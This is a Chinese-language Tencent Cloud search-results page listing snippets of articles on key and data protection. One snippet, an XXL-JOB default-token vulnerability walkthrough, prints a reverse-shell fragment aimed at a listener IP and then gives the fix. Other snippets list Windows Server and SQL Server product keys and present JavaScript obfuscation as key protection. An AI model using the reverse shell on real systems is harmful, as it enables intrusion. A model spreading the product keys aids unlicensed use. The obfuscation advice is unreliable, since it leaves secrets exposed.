- 综合排序
- 最热优先
- 最新优先
- 来自专栏数安视界
根密钥保护的困境与思考
引言根密钥保护,是一个重要且复杂的议题,因为根密钥是整个加密体系中最核心的部分。这里所说的根密钥,其背后往往涉及的是一个密钥保护链,这个密钥保护链最终服务的就是业务系统中的敏感数据。 密钥的链式保护密钥本身也是一种数据,因此,数据的保护依赖于数据密钥,而数据密钥的保护,又依赖于保护数据密钥的密钥,这里我们统一称其为根密钥。基于根密钥的密钥保护链,构成了数据保护的一种范式。 根密钥的重要性根密钥是整个链式保护体系的信任基础,根密钥的泄露将会导致整个信息体系的崩塌。信任的起点:根密钥是构建信任的起点,所有的加密操作和数据保护措施都建立在根密钥的安全性之上。 数据保护的核心:根密钥是数据保护的核心,它直接影响到数据的机密性、完整性和可用性。安全策略的支撑:根密钥支撑着整个组织的安全策略,包括访问控制、数据加密、身份验证等。 根密钥的动态化根密钥的动态化是链式密钥保护体系中比较好的一种落地方式。有助于提高整个加密体系的安全性和灵活性。
9691512编辑于 2024-05-18 - 来自专栏javascript技术
前端js中如何保护密钥?
在前端js编程中,如果涉及到加密通信、加密算法,经常会用到密钥。但密钥,很容易暴露。暴露原因:js代码透明,在浏览器中可以查看源码,从中找到密钥。 例如,下面的代码中,变量key是密钥:如何保护源码中的密钥呢?很多时候,人们认为需要对密钥字符串进行加密。其实更重要的是对存储密钥的变量进行加密。加密了密钥变量,使变量难以找到,才更能保护密钥本身。 顺着这个思路,下面给出一个不错的密钥的保护方法:还是以上面的代码为例,首先,用到jsfuck:https://www.jshaman.com/tools/jsfuck.html将代码中的密钥定义整体,用 ,也可以使用这个办法,也能很好的隐藏密钥。 用jsfuck+jshaman保护JS中的密钥,你学会了吗?
96310编辑于 2024-10-29 - 来自专栏腾讯云API
腾讯云 API 最佳实践:保护你的密钥
什么是密钥? 你会发现你甚至无法直接看到密钥,只能通过短信获得短暂的解锁,可见它的重要性。另外,一个帐号可以生成多个密钥,当你觉得密钥可能已经被泄漏时,你可以删除旧的密钥,创建新的密钥继续使用腾讯云的服务。 泄漏密钥会让有恶意的人获得和你相同的权限,可能对财产造成无法挽回的损失。 如何保护你的密钥 那么在你的代码中,你该如何保护你的密钥呢? 经过这样的保护措施,除非别人直接接触到你的环境,否则就无法获得你的密钥,至少无法获得你的 SecretKey 。 此外,你的代码也获得了稳定性。 除了把密钥放在环境变量中,还有其他方式保护密钥吗?有的,但是未必很友好: 将密钥放在配置文件中,代码读取配置文件。这是另一种通行的做法,特别是当你在写一个正式的服务时。
16.9K120发布于 2018-07-18 - 来自专栏JVMGC
6.5K Star开源工具:保护你的SSH密钥
安全隔离区是指集成到 Apple 片上系统 (SoC) 的专用安全子系统,它独立于主处理器,可提供额外的安全保护。 功能特点 1.存储和管理SSH密钥:Secretive可以安全地存储和管理你的SSH密钥,确保它们不会被恶意用户或恶意软件复制。 2.安全区域支持:如果你的Mac设备具备安全区域支持,Secretive可以将SSH密钥存储在安全区域中。由于安全区域的设计特性,无法导出存储在其中的密钥。 也可以用以下命令直接安装 brew install secretive 2.导入和生成SSH密钥:使用Secretive应用程序生成或导入你的SSH密钥。 4.使用SSH密钥:一旦你的密钥被存储在Secretive中,你可以使用标准的SSH客户端或其他应用程序来访问和使用你的SSH密钥。
40610编辑于 2023-12-04 - 来自专栏FreeBuf
AWS Key disabler:AWS IAM用户访问密钥安全保护工具
关于AWS Key disabler AWS Key disabler是一款功能强大的AWS IAM用户访问密钥安全保护工具,该工具可以通过设置一个时间定量来禁用AWS IAM用户访问密钥,以此来降低旧访问密钥所带来的安全风险 AWS Key disabler本质上是一个Lambda函数,可以通过下列工作流来实现其功能: 工具要求 当前版本的AWS Key disabler脚本需要使用到下列组件: 1、Node.js和NPM; 2、 任务运行器,并安装相关依赖: cd grunt/ npm install 然后在/grunt/package.json文件中添加下列信息: 1、设置AWS账号的aws_account_number值; 2、 设置first_warning和last_warning,即触发警报邮件(发送至report_to)的天数时间; 3、设置expiry,即密钥超时天数,如果超时,则会通过电子邮件向用户发送提醒; 4、设置 Changing key to INACTIVE state", "accesskeyid": "**************ER2E2" }, { "age":
42210编辑于 2024-04-18 - 来自专栏FreeBuf
索尼PS5曝两个内核漏洞,可用来窃取根密钥
继Xbox主机曝出外挂后,索尼PS5也在同一日曝出两个内核漏洞,攻击者利用这两个漏洞窃取了PS5的根密钥,这引发了大众对游戏主机的新一轮担忧。 FailOverFlow黑客组织在推特上发布了一条状态,晒出PS5固件的对称根密钥。之前该组织还在推特上公布了其他几个主机的越狱方法。 该组织声称已经从软件中获得了所有PS5的根密钥,并强调是每台主机。
57320发布于 2021-11-23 - 来自专栏全栈程序员必看
windows server 2012 r2安装密钥_windows7激活密钥
Windows Server 2012 R2 安装密钥(只适用安装,不支持激活) 标准版 = NB4WH-BBBYV-3MPPC-9RCMV-46XCB 数据中心版 = BH9T4-4N7CW- 67J3M-64J36-WW98Y M98WF-NY2PP-73243-PC8R6-V6B4Y Retail Key MR88Y-BXNRY-VH3DR-349CB-3GK8M retail Key M89WF-NY2PP
18.5K20编辑于 2022-11-04 - 来自专栏openclaw系列
OpenClaw API密钥安全管理完全指南:保护你的AI资产
为什么API密钥安全如此重要?在2026年的AI时代,API密钥已经成为企业和个人的核心数字资产。 /bin/bash#简单的加密脚本#加密函数encrypt_api_key(){localkey=$1localpassword=$2echo"$key"|opensslenc-aes-256-cbc-salt-passpass :"$password"-base64}#解密函数decrypt_api_key(){localencrypted=$1localpassword=$2echo"$encrypted"|opensslenc-aes 使用量超过阈值,当前值:{{$value}}令牌"-alert:APIKeyLeakDetectedexpr:rate(openclaw_api_requests_total[5m])>100for:2mlabels 通过本文介绍的最佳实践,你可以显著提高OpenClaw环境中API密钥的安全性,保护你的AI资产免受损失。记住,安全是一个持续的过程,而不是一次性的努力。
82020编辑于 2026-03-19 - 来自专栏全栈程序员必看
过压保护(2)_过压保护值和欠压保护值
当没有外部电源接入时,如果电池电压高于2.8V-3.2V的保护门限,/EN被R2拉低, MAX4842驱动Q1、Q2的栅极为高电平使其导通,电池为负载供电; 当有外部电源接入时,通过R1/R2分压后在 (电路要求可达30V,mos导通电阻小) 2、MOS的电路设计方法,如电阻取值等? 3、是否有更好的过压保护电路方案? LTC4360-1 / LTC4360-2 – 过压保护控制器 特点 2.5V 至 5.5V 工作电压 过压保护高达 80V 对于大多数应用无需使用输入电容器或 TVS (瞬态电压抑制器) 准确度为 2% 应用 USB 保护 手持式计算机 蜂窝电话 / 智能手机 MP3 / MP4 播放器 数码相机 LTC4361-1 / LTC4361-2 – 过压 / 过流保护控制器 特点 2.5V 至 5.5V 工作电压 8 引脚 ThinSOTTM 封装和 8 引脚 (2mm x 2mm) DFN 封装 描述 LTC®4361 过压 / 过流保护控制器可保护 2.5V 至 5.5V 系统免遭输入电源过压的损坏。
2.4K20编辑于 2022-09-20 - 来自专栏全栈程序员必看
SQLServer2008R2密钥「建议收藏」
SQLServer2008 R2 密钥: Developer: PTTFM-X467G-P7RH2-3Q6CG-4DMYB Enterprise: JD8Y6-HQG69-P9H84-XDTPG-34MBB Microsoft SQL Server 2008 R2序列号密钥 开发版32位:MC46H-JQR3C-2JRHY-XYRKY-QWPVM 开发版64位:FTMGC-B2J97-PJ4QG-V84YB-MTXX8 工组版:XQ4CB-VK9P3-4WYYH-4HQX3-K2R6Q WEB版:FP4P7-YKG22-WGRVK-MKGMX-V9MTM 数据中心版32位:PTTFM-X467G-P7RH2-3Q6CG -4DMYB 数据中心版64位:DDT3B-8W62X-P9JD6-8MX7M-HWK38 企业版32位:R88PF-GMCFT-KM2KR-4R7GB-43K4B 企业版64位:GYF3T-H2V88 -GRPPH-HWRJP-QRTYB 标准版32位:CXTFT-74V4Y-9D48T-2DMFW-TX7CY 标准版64位:B68Q6-KK2R7-89WGB-6Q9KR-QHFDW 发布者:全栈程序员栈长
12.2K30编辑于 2022-07-22 - 来自专栏区块链大本营
保护数据库信息,如何用Go语言+对称密钥做数据加密?
一、数据写入 1、读取输入信息(明文) 2、将明文加密为密文 3、将密文写入到数据库中 二、数据读取 1、从数据库中读取密文 2、将密文解密为明文 3、发送明文 三、加密算法 对称密钥非常适合该任务的应用场景 因此无需与另一方交换密钥,双方使用同一密钥。 2、与非对称加密相比,对称加密速度更快,其带来的额外速度在数据交互服务总是受欢迎的。 3、每个数据字段中的文本可能很大。 该过程需要使用加密过程中使用的密钥。 (2)第二部分主要进行解密。数据库中的数据是base64格式的字符串类型。在运行Open函数之前,我们需要将其格式转换为字节类型。 只要密钥得到很好的保护(不泄露),AES机制就可以安全使用。上述方案被认为是数据库信息安全的最低要求,因为它只实现了两个基本要素(算法和密钥)。 此外,我们可以使用更多的方法来确保数据安全,比如salt,这样即使密钥被盗,攻击者也不能利用密钥来解密密文。
1.5K10发布于 2020-02-21 - 来自专栏飞鸟的专栏
使用OAuth2保护API
以下是使用OAuth2保护API的详细步骤:步骤1:注册客户端 在使用OAuth2保护API之前,客户端必须先在OAuth2服务器上进行注册。 注册过程需要提供客户端的详细信息,例如客户端ID、客户端密钥、重定向URL等。步骤2:用户授权 当用户尝试访问受保护的资源时,他们将被重定向到OAuth2服务器以进行身份验证。 如果用户授权,则OAuth2服务器将向客户端返回一个授权码。步骤3:交换访问令牌 使用客户端ID和客户端密钥,客户端可以使用授权码向OAuth2服务器请求访问令牌。 以下是使用OAuth2保护API的示例:假设我们有一个受保护的API,客户端需要使用OAuth2才能访问该API。 请求中包含授权码、客户端ID、客户端密钥和重定向URL等信息。
1.6K20编辑于 2023-04-13 - 来自专栏OneMoreThink的专栏
漏洞实战(2):XXL-JOB默认密钥漏洞
2、危害 攻击者可以对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 /dev/tcp/10.58.81.108/4444 0>&1", 4、防御 修改accessToken的默认值,调度中心和执行器的值需保持一致,例如将accessToken修改为cGqJjTqH2VMB2R1 : sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-admin/src/main/resources /application.properties sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-executor-samples xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.4.0.jar 最后再次使用默认密钥进行任意代码执行
1.8K10编辑于 2024-10-15 - 来自专栏工程师看海
电池保护2:锂电池放电过流保护原理OCD
锂电池的使用越来越普及,市面上大部分电子产品都使用的是锂电池,锂电池有4种基本保护,分别是过度充电(OVP)、过度放电(UVP)、充电过流(OCC)、放电过流(OCD)(负载短路)。 我们通常见到的设备上的电池包,是由电芯(CELL)和保护板两部分构成的。保护功能由保护板实现。 过度放电保护逻辑以前曾经介绍过,今天介绍放电过流的保护原理。 下面是一个电池保护板的原理图框图以及放电回路,放电回路是绿色箭头部分,其中COUT、DOUT分别是充电(charge)、放电(Discharge)控制引脚,V-是重要的sence引脚,用来检测电池各种过放 同时,需要注意的是,如果在放电过流保护状态下进行充电,保护IC也会退出OCD状态,因为充电时的回路和放电回路相反,见下图,在放电时V-电压高于VSS,充电时相反,V-电压降低,这就满足了退出放电过流的条件 以上就是电池放电过流的保护原理。
3.4K21编辑于 2022-06-23 - 来自专栏北京马哥教育
fail2ban保护linux安全
一、下载安装 #wget http://cdnetworks-kr-2.dl.sourceforge.net/project/fail2ban/fail2ban-stable/fail2ban- 0.8.4/fail2ban-0.8.4.tar.bz2 #tar xvfj fail2ban-0.8.4.tar.bz2 #cd fail2ban-0.8.4 #python = /tmp/fail2ban.sock jail.conf配置里是fail2ban所保护的具体服务的配置,这里以SSH来讲。 那么就要修改fail2ban的启动规则,把上面那条改为 iptables -I INPUT 2 -p --dport -j fail2ban- 这样fail2ban就会把自己的规则作为INPUT 来看看sshd的规则,就能了解这些filter应该怎么写,你就可以 用fail2ban来保护更多自己的服务。
1.3K80发布于 2018-05-02 - 来自专栏编程技术宇宙
中国不是没有根服务器吗?《流浪地球2》的根服务器怎么在北京?
不知道大家春节有没有去看电影,我去看了,对,是《流浪地球2》。 这片儿看得可太爽了,尤其是对咱们理工男的胃口,有涉及天体物理学、军事科技、机械装备等众多理工科领域。 就连我们程序员也能在里面找到根服务器、人工智能这些熟悉的东西。 这电影中有一个重要的任务,就是要重启全球互联网,来联动全世界的行星发动机。这么重要的东西为啥不用专网通信,而是要用互联网? 好吧,不管这个问题,说回电影,重启全球互联网的一个重要操作就是重启根服务器,分别位于中国北京、日本东京、美国杜勒斯。 看到这三个城市名,我又来了疑问:我记得全世界共有13个根服务器(注意不是13台物理服务器,不算anycast,也不算镜像),这里面没有中国的份吧? 知乎上有这么一个问题: 我们来看一下这位大佬,《流浪地球2》的官方科学顾问的回答: 真相明白了,电影里设定的互联网是基于IPv6的互联网,不是我们当下的IPv4。
3K20编辑于 2023-03-02 - 来自专栏大内老A
ASP.NET Core 6框架揭秘实例演示:“数据保护”框架基于文件的密钥存储
《数据加解密与哈希》演示了“数据保护”框架如何用来对数据进行加解密,而“数据保护”框架的核心是“密钥管理”。 数据保护框架以XML的形式来存储密钥,默认的IKeyManager实现类型为XmlKeyManager。 >(); var key1 = keyManager.CreateNewKey(DateTimeOffset.Now, DateTimeOffset.Now.AddDays(1)); var key2 DateTimeOffset.Now, DateTimeOffset.Now.AddDays(3)); Console.WriteLine(key1.KeyId); Console.WriteLine(key2. 图2 描述密钥撤销的XML文件 如下所示的是这两个描述密钥撤销的XML文件的内容,可以看出XML结构与前面提供的RevokeKey和RevokeAllKeys方法的定义是匹配的。
90440编辑于 2022-05-09 - 来自专栏安智客
一切不谈密钥保护的加密都是耍流氓!你的区块链可信吗?
(1)2014年2月24日,当时世界上最大的比特币交易所运营商Mt.Gox 宣布其交易平台的85万个比特币被盗一空,随后火速下线并申请破产保护。 硬实现一般是依托专用密码安全芯片或者密码设备作为载体,一般有物理保护、敏感数据保护、密钥保护等机制,确保私钥必须由专用硬件产生。 国家正在大力推广国产密码算法SM2(非对称算法)、SM3(摘要算法)等。 PKI/CA领域对私钥的生命周期保护,刚刚开始的时候也和区块链类似使用软实现。 传统PC时代的密钥保护工具由于成本高、适配型差、携带使用不便等已无法被人们所接受。 2、抓住产业爆发式增长的战略机遇,提前规划移动端密钥保护和云端密钥保护方案。 3、积极进行密码算法的国产化改造,替换ECC和SHA256为SM2、SM3,真正实现合法合规落地。
2.3K61发布于 2018-02-24 - 来自专栏全栈程序员必看
WPA2协议新攻击方法(KRACK)—WPA2密钥重安装漏洞
在WPA2协议中,4次握手提供身份认证和会话密钥协商功能,而机密性和完整性是加密协议(比如AES-CCMP协议)来保证的。 WPS(Wi-Fi Protected Setup,Wi-Fi保护设置)(别名AOSS、QSS,)是简化无线局域网的安装及安全性能配置工作的一个协议。 结果导致相同的加密密钥和已经使用到的随机数一起被使用。这可能导致wpa2的使用加密协议在加密报文的时候都复用同一个已经使用过的密钥序列。 该攻击并不是完全否定WPA2的四次握手安全属性。实际上,会话密钥依然是安全的,同时AP和客户端的身份认证功能也是安全的。攻击者实际上在握手过程中是无法冒充客户端或都AP。 四次握手的数学证明并没保证密钥会被重安装。四次握手保证了密钥协商是安全的、握手信息无法被篡改。 设备发布补丁前,我需要使用wep协议不? 别傻啦,用wep不如用wpa2.!
1.6K10编辑于 2022-06-28 - 来自专栏技术杂记
Hypervisor Necromancy;恢复内核保护器(2)
甚至 虽然我们将从 EL3 直接降到 EL1 以允许 专有的 EL2 实现来定义自己的状态,我们仍然必须 设置一些 EL2 状态寄存器值来初始化 EL1 执行状态。 详细地说,要从 EL3 下降到 EL2,我们必须在 Secure 中定义 EL2 状态 配置寄存器 (SCR_EL3)。 page table PA orr \tmp2, \tmp2, #AARCH64_PGTBL_TBL_ENTRY // valid table entry str \tmp2, [\tbl 2 级条目索引 (2) 为 0 并且 该条目的值为 0x80000711,表示物理上的块条目 地址 0x80000000。 由于EL2 未设置异常向量表,唯一的方法是下降到 EL2 来自 EL3,就像我们对 EL1 所做的那样。
2.8K390编辑于 2022-02-09
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号